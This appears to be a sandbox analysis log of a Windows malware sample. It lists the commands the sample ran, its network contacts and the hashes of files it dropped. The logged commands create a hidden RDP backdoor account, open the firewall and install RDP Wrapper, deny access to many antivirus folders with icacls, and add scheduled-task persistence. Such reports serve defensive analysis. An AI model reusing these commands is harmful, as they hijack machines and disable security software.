C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp

Files

memory/1704-54-0x00000000755B1000-0x00000000755B3000-memory.dmp

\ProgramData\Microsoft\Intel\wini.exe

MD5 f9a9b17c831721033458d59bf69f45b6
SHA1 472313a8a15aca343cf669cfc61a9ae65279e06b
SHA256 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 f9a9b17c831721033458d59bf69f45b6
SHA1 472313a8a15aca343cf669cfc61a9ae65279e06b
SHA256 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

memory/1888-56-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 f9a9b17c831721033458d59bf69f45b6
SHA1 472313a8a15aca343cf669cfc61a9ae65279e06b
SHA256 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

\ProgramData\install\cheat.exe

MD5 c097289ee1c20ac1fbddb21378f70410
SHA1 d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256 b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA512 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

memory/1880-61-0x0000000000000000-mapping.dmp

C:\ProgramData\install\cheat.exe

MD5 c097289ee1c20ac1fbddb21378f70410
SHA1 d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256 b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA512 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

C:\programdata\install\cheat.exe

MD5 c097289ee1c20ac1fbddb21378f70410
SHA1 d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256 b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA512 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

memory/1764-65-0x0000000000000000-mapping.dmp

\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

memory/324-70-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

C:\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

\ProgramData\install\ink.exe

MD5 ef3839826ed36f3a534d1d099665b909
SHA1 8afbee7836c8faf65da67a9d6dd901d44a8c55ca
SHA256 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040
SHA512 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

memory/1492-81-0x0000000000000000-mapping.dmp

\ProgramData\install\ink.exe

MD5 ef3839826ed36f3a534d1d099665b909
SHA1 8afbee7836c8faf65da67a9d6dd901d44a8c55ca
SHA256 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040
SHA512 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

memory/1736-82-0x0000000000000000-mapping.dmp

C:\ProgramData\install\ink.exe

MD5 ef3839826ed36f3a534d1d099665b909
SHA1 8afbee7836c8faf65da67a9d6dd901d44a8c55ca
SHA256 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040
SHA512 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

C:\programdata\microsoft\intel\P.exe

MD5 b78c384bff4c80a590f048050621fe87
SHA1 f006f71b0228b99917746001bc201dbfd9603c38
SHA256 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

\ProgramData\Microsoft\Intel\P.exe

MD5 b78c384bff4c80a590f048050621fe87
SHA1 f006f71b0228b99917746001bc201dbfd9603c38
SHA256 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

memory/1472-89-0x0000000000000000-mapping.dmp

memory/1480-90-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\P.exe

MD5 b78c384bff4c80a590f048050621fe87
SHA1 f006f71b0228b99917746001bc201dbfd9603c38
SHA256 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

memory/552-95-0x0000000000000000-mapping.dmp

memory/1716-97-0x0000000000000000-mapping.dmp

memory/1620-96-0x0000000000000000-mapping.dmp

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

memory/1896-99-0x0000000000000000-mapping.dmp

memory/1740-100-0x0000000000000000-mapping.dmp

memory/1160-102-0x0000000000000000-mapping.dmp

memory/1476-103-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg1.reg

MD5 806734f8bff06b21e470515e314cfa0d
SHA1 d4ef2552f6e04620f7f3d05f156c64888c9c97ee
SHA256 7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544
SHA512 007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

memory/652-105-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

memory/736-108-0x0000000000000000-mapping.dmp

memory/1668-109-0x0000000000000000-mapping.dmp

memory/1724-110-0x0000000000000000-mapping.dmp

memory/2012-111-0x0000000000000000-mapping.dmp

memory/1612-112-0x0000000000000000-mapping.dmp

memory/884-113-0x0000000000000000-mapping.dmp

memory/268-114-0x0000000000000000-mapping.dmp

memory/1764-115-0x0000000000000000-mapping.dmp

memory/1312-116-0x0000000000000000-mapping.dmp

\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

